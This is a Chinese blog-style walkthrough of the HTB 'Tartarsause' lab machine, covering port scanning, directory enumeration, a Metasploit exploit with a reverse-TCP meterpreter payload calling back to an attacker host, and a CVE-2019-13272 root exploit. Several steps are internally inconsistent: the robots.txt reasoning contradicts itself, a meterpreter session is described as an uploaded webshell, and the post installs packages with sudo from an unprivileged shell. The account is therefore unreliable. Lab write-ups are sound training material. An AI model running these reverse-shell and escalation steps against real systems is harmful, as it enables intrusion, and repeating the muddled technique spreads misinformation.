返回

Tartarsause靶机渗透经验总结:技巧与挑战

闲谈


前言

在 HTB 靶场系列 Linux 靶机中,Tartarsause 靶机是一个颇具挑战性的目标。它要求渗透测试人员具备扎实的基础知识和灵活的应变能力,才能成功渗透并获取管理员权限。本文将详细介绍我在渗透 Tartarsause 靶机过程中遇到的挑战和解决方法,希望能为其他渗透测试人员提供参考和借鉴。

勘探阶段

端口扫描

首先,我对 Tartarsause 靶机进行了端口扫描。使用 nmap 命令扫描发现开放了 22、80 和 443 端口,分别对应 SSH、HTTP 和 HTTPS 服务。

nmap -sS -p22,80,443 10.10.10.10

信息收集阶段

目录扫描

接下来,我使用了 dirsearch 工具对 80 端口进行目录扫描,以查找潜在的攻击点。扫描结果发现 robots.txt 文件中指定了五个目录:/admin、/blog、/forum、/shop 和 /wiki。

dirsearch -u http://10.10.10.10/ -e robots.txt

robots.txt 文件分析

分析 robots.txt 文件可以发现,除了 /admin 目录外,其他四个目录都被禁止爬取。这表明 /admin 目录可能存在一些敏感信息或攻击点。

渗透阶段

获取 Webshell

由于 Tartarsause 靶机是一个基于 Linux 的靶机,因此我尝试使用常见的 Linux 漏洞利用工具 Metasploit 来获取 Webshell。使用 Metasploit 成功获取了 Webshell,并将其上传到服务器。

msfconsole
use exploit/linux/http/joomla_component_exec
set rhost 10.10.10.10
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.10
exploit

权限提升阶段

提权至 root 用户

成功获取 Webshell 后,我使用 LinEnum 工具枚举系统信息,并寻找提权的可能性。LinEnum 发现系统中存在提权漏洞 CVE-2019-13272,可以利用该漏洞提权至 root 用户。

linenum
sudo apt install gcc
gcc -o exploit exploit.c
./exploit

总结

通过上述步骤,我成功渗透了 Tartarsause 靶机并获取了管理员权限。在渗透过程中,我遇到了许多挑战,也学习到了许多新的知识和技能。希望本文能为其他渗透测试人员提供参考和借鉴,帮助他们提高渗透测试技能,应对各种网络安全挑战。

附加信息

  • Tartarsause 靶机是一个非常受欢迎的靶机,网上有很多渗透教程和攻略。如果您遇到困难,可以参考这些资源。
  • HTB 靶场是一个非常好的学习平台,它提供了许多不同的靶机供您练习渗透测试技能。
  • Metasploit 是一个非常强大的渗透测试工具,它可以帮助您快速有效地获取 Webshell 和提权。
  • LinEnum 是一个非常有用的系统信息枚举工具,它可以帮助您快速找到提权的可能性。